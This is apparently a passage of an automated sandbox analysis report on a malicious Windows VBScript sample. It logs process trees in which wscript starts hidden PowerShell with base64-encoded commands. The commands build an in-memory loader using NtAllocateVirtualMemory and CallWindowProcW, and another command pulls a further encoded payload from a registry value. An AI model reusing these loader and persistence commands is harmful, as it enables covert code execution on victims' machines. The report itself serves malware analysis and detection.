Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAc Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kxeayl3s.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1FFF.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB9D447D8E2849BB9EF6D8A3F7C9ADB.TMP" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAG
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3rumnuxb.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kar5iszo.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD7.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1B043D375E64A49ADE1599E795DF7E1.TMP"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA6F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC12B2DF4544A1496EA7EB89E07B3D3FC6.TMP"
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220128 Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\TRICA.dat Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winVBS@44/42@38/3
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: 20.0.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 20.0.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 20.0.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.AccessControl.MutexSecurity System.Threading.Mutex::GetAccessControl()
Source: 20.0.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Security.AccessControl.MutexSecurity::AddAccessRule(System.Security.AccessControl.MutexAccessRule)
Source: 20.0.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Threading.Mutex::SetAccessControl(System.Security.AccessControl.MutexSecurity)
Source: 26.2.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 26.2.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.2.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.AccessControl.MutexSecurity System.Threading.Mutex::GetAccessControl()
Source: 26.2.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Security.AccessControl.MutexSecurity::AddAccessRule(System.Security.AccessControl.MutexAccessRule)
Source: 26.2.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Threading.Mutex::SetAccessControl(System.Security.AccessControl.MutexSecurity)
Source: dslmon.exe.16.dr, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: dslmon.exe.16.dr, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: dslmon.exe.16.dr, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.AccessControl.MutexSecurity System.Threading.Mutex::GetAccessControl()
Source: dslmon.exe.16.dr, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Security.AccessControl.MutexSecurity::AddAccessRule(System.Security.AccessControl.MutexAccessRule)
Source: dslmon.exe.16.dr, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Threading.Mutex::SetAccessControl(System.Security.AccessControl.MutexSecurity)
Source: 26.0.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 26.0.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.0.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.AccessControl.MutexSecurity System.Threading.Mutex::GetAccessControl()
Source: 26.0.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Security.AccessControl.MutexSecurity::AddAccessRule(System.Security.AccessControl.MutexAccessRule)
Source: 26.0.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Threading.Mutex::SetAccessControl(System.Security.AccessControl.MutexSecurity)
Source: 20.2.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 20.2.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 20.2.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.AccessControl.MutexSecurity System.Threading.Mutex::GetAccessControl()
Source: 20.2.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Security.AccessControl.MutexSecurity::AddAccessRule(System.Security.AccessControl.MutexAccessRule)
Source: 20.2.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Threading.Mutex::SetAccessControl(System.Security.AccessControl.MutexSecurity)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
